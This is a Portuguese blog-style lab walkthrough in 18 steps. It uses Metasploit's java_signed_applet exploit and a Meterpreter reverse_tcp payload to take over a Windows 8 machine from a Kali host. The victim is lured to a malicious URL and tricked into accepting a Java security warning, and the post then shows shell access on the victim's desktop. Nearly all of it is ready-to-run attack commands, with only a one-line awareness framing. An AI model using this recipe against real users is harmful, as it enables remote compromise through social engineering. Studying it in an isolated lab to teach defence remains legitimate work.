Windows 8 — Invasão através do Java Signed Applet
0
0

Windows 8 — Invasão através do Java Signed Applet

Marcos Henrique
0 min
0
0

Digite ou cole seu texto bem aqui.

Email image

Esta vulnerabilidade pode ser facilmente explorada aliada a técnica de engenharia social, por isso que é importante conscientizar as pessoas para não clicarem em qualquer link que recebem.

Laboratório

Kali Linux : 10.10.10.130
Windows 8 : 10.10.10.129

01 — Passo

Execute o MSF Console.

msfconsole

Email image

02 — Passo

Utilize o exploit java_signed_applet.

msf > use exploit/multi/browser/java_signed_applet

Email image

03 — Passo

Defina o servidor Kali Linux 10.10.10.130 como conexão principal do exploit java_signed_applet.

msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130

Email image

04 — Passo

Defina a porta do servidor Kali Linux 8080 como conexão principal do exploit java_signed_applet.

msf exploit (java_signed_applet) > set SRVPORT 8080

Email image

05 — Passo

Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor.

msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp

Email image

06 — Passo

Defina o servidor Kali Linux 10.10.10.130 como conexão principal para o PAYLOAD reverse_tcp.

msf exploit (java_signed_applet) > set LHOST 10.10.10.130

Email image

07 — Passo

Defina a porta do servidor Kali Linux 10.10.10.130 como conexão principal para o PAYLOAD reverse_tcp.

msf exploit (java_signed_applet) > set LPORT 4444

Email image

08 — Passo

Execute o exploit para gerar a URL a ser acessada pelo Windows 8 http://10.10.10.130:8080/clR8lKjmGpiSXqQ.

msf exploit (java_signed_applet) > exploit

Email image

09 — Passo

No Windows 8 ao realizar o acesso ao link http://10.10.10.130:8080/clR8lKjmGpiSXqQ será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar.

Email image

10 — Passo

Observe que a conexão foi estabelecida com o servidor.

Email image

11 — Passo

Execute o comando sessions para exibir as sessões de conexão.

msf exploit (java_signed_applet) > sessions

Email image

12 — Passo

Estabeleça a conexão na sessão 1.

msf exploit (java_signed_applet) > sessions -i 1

Email image

13 — Passo

Com a conexão estabelecido digite comando utilizados no windows como o ipconfig para visualizar as conexões de rede.

meterpreter > ipconfig

Email image

14 — Passo

Utilize o comando sysinfo para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional.

meterpreter > sysinfo

Email image

15 — Passo

Execute o comando shell para exibir o console do Windows 8.

meterpreter > shell

Email image

16 — Passo

Liste todos arquivos/diretórios que estão no Desktop.

C:\Users\Marcos\Desktop>dir

Email image

17 — Passo

Crie o diretório 100SECURITY.

C:\Users\Marcos\Desktop>mkdir 100SECURITY

Email image

18 — Passo

Como pode visualizar o diretório 100SECURITY foi criado com sucesso.

Email image

Fonte: https://www.100security.com.br/windows8-invasao